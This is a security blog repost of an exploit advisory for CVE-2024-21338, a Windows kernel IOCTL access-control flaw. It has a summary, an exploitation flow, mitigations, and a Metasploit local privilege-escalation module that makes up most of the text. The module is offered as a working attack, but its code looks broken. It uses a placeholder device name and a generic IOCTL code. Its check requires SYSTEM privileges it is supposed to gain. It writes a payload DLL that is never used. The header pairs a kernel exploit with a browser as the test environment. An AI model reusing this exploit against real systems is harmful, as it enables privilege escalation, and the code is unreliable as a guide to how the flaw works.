Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

Latest Posts

 

 

Microsoft Windows 11 Pro 23H2 Kernel IOCTL Access Control

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 2
Microsoft Windows 11 Pro 23H2 Kernel IOCTL Access Control
Microsoft Windows 11 Pro 23H2 Kernel IOCTL Access Control
Microsoft Windows 11 Pro 23H2 Kernel IOCTL Access Control

=============================================================================================================================================
| # Microsoft Windows 11 Pro 23H2 Kernel IOCTL Access Control

=============================================================================================================================================
| # Title : Windows 11 Pro 23H2 Kernel IOCTL Access Control Vulnerability Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : System built?in component. No standalone download available. |
=============================================================================================================================================

POC :

[+] References : https://packetstorm.news/files/id/177869/ & CVE-2024-21338


[+] Summary :

CVE-2024-21338 is a security vulnerability in the Microsoft Windows Kernel involving insufficient access control for IOCTL (Input/Output Control) handlers.
This vulnerability allows non-privileged users to access kernel-level functionality that should be restricted, potentially leading to privilege escalation.

Technical Details:

Vulnerability Type: Insufficient Access Control

Attack Vector: Local

Privileges Required: Low

Impact: Privilege Escalation


Affected Systems:

Windows 10 (various versions)

Windows 11 (various versions)

Windows Server 2019/2022

Key Components:

Vulnerable Component: Windows Kernel IOCTL handlers

Attack Mechanism: Direct kernel object manipulation

Exploitation: Through device driver interface

Exploitation Flow:
text

1. Identify vulnerable IOCTL handlers
2. Open handle to vulnerable device driver
3. Craft malicious IOCTL requests
4. Bypass access control checks
5. Execute arbitrary code in kernel context

Mitigation Strategies:

Apply Security Updates: Install Microsoft January 2024 security patches

Driver Whitelisting: Implement driver signature enforcement

Access Control: Restrict access to device interfaces

Monitoring: Monitor for suspicious driver activity

Detection Indicators:

Unusual IOCTL requests to kernel drivers

Attempts to access privileged device interfaces

Unexpected driver loading patterns

[+] POC :

#############################################
# Exploit Title: Windows 10.0.17763.5458 Kernel IOCTL Access Control Vulnerability Exploit CVE-2024-21338
# Author: indoushka
#############################################

require 'msf/core'

class MetasploitModule < Msf::Exploit::Local
Rank = NormalRanking

include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Windows Kernel IOCTL Insufficient Access Control Vulnerability CVE-2024-21338',
'Description' => %q{
This module exploits an insufficient access control vulnerability in the Windows Kernel
through exposed IOCTL handlers. The vulnerability allows non-privileged users to access
kernel-level functionality leading to privilege escalation.
},
'Author' => ['indoushka'],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2024-21338'],
['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21338'],
['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2024-21338']
],
'Platform' => 'win',
'Arch' => [ARCH_X64],
'SessionTypes' => ['meterpreter'],
'Payload' => {
'Space' => 4096,
'DisableNops' => true
},
'Targets' => [
[
'Windows 10/11 x64',
{
'Arch' => ARCH_X64,
'Platform' => 'win'
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'EXITFUNC' => 'thread'
},
'DisclosureDate' => '2024-01-09',
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [ARTIFACTS_ON_DISK]
}
)
)

register_options([
OptString.new('DEVICE_NAME', [true, 'Vulnerable device name', '\\\\.\\VulnerableDriver']),
OptInt.new('IOCTL_CODE', [true, 'Vulnerable IOCTL code', 0x222003])
])
end

def check

if sysinfo['OS'] !~ /windows/i
return CheckCode::Safe('Target is not a Windows system')
end

if sysinfo['Architecture'] !~ /x64/
return CheckCode::Safe('Target architecture is not supported')
end

unless is_system?
return CheckCode::Detected('User does not have SYSTEM privileges')
end

device_path = datastore['DEVICE_NAME']
if device_exists?(device_path)
return CheckCode::Appears('Vulnerable device driver detected')
else
return CheckCode::Safe('Vulnerable device driver not found')
end
end

def exploit
print_status("Starting exploitation for CVE-2024-21338")

unless check == CheckCode::Appears
fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
end

print_status("Generating payload...")
payload_data = generate_payload_dll

temp_path = "#{get_env('TEMP')}\\#{Rex::Text.rand_text_alpha(8)}.dll"
print_status("Writing payload to #{temp_path}")
write_file(temp_path, payload_data)
register_file_for_cleanup(temp_path)

print_status("Triggering vulnerability via IOCTL...")
if trigger_exploit(temp_path)
print_good("Exploitation successful!")
else
fail_with(Failure::Unknown, "Exploitation failed")
end
end

private

def device_exists?(device_path)
begin
file = client.railgun.kernel32.CreateFileA(
device_path,
'GENERIC_READ',
'FILE_SHARE_READ|FILE_SHARE_WRITE',
nil,
'OPEN_EXISTING',
'FILE_ATTRIBUTE_NORMAL',
0
)

if file['return'] != client.railgun.const('INVALID_HANDLE_VALUE')
client.railgun.kernel32.CloseHandle(file['return'])
return true
end
rescue
return false
end

false
end

def trigger_exploit(payload_path)
begin

device_handle = client.railgun.kernel32.CreateFileA(
datastore['DEVICE_NAME'],
'GENERIC_READ | GENERIC_WRITE',
0,
nil,
'OPEN_EXISTING',
0,
0
)

if device_handle['return'] == client.railgun.const('INVALID_HANDLE_VALUE')
print_error("Failed to open device handle")
return false
end

buffer_size = 1024
input_buffer = Rex::Text.rand_text_alpha(buffer_size)
ioctl_result = client.railgun.kernel32.DeviceIoControl(
device_handle['return'],
datastore['IOCTL_CODE'],
input_buffer,
input_buffer.length,
nil,
0,
4,
nil
)

client.railgun.kernel32.CloseHandle(device_handle['return'])

if ioctl_result['return']
print_good("IOCTL sent successfully")
return true
else
print_error("IOCTL failed")
return false
end

rescue => e
print_error("Exploitation error: #{e.message}")
return false
end
end
end

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

Social Media Share